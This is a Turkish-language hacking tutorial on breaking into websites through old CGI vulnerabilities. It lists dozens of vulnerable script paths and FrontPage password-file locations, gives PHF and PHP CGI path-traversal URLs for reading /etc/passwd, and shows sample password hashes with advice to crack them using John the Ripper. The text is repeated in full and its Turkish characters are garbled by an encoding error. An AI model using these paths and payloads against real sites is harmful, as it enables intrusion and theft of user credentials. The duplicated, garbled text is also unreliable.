Cgi açıkları ile wep site hacklemek
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML scri*t > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI Scanner kullanabiliriz. Not: CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd yazarýz. Tabi çýkan dosya etc içindeki username ve password'lerin olduðu password dosyasý olacaktýr. Þu þekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çýkan password'larý bir password cracker ile kýrabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaðýz? http://www.domain.com/_vti_pvt/services.pwd
yazarýz. Ýþte bir de PHP CGI örneði: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayýn mantýðýný biraz da olsa kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup veya yazýp çalýþtýrmanýz gerek.
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML scri*t > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI Scanner kullanabiliriz. Not: CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd yazarýz. Tabi çýkan dosya etc içindeki username ve password'lerin olduðu password dosyasý olacaktýr. Þu þekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çýkan password'larý bir password cracker ile kýrabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaðýz? http://www.domain.com/_vti_pvt/services.pwd
yazarýz. Ýþte bir de PHP CGI örneði: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayýn mantýðýný biraz da olsa kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup veya yazýp çalýþtýrmanýz gerek.
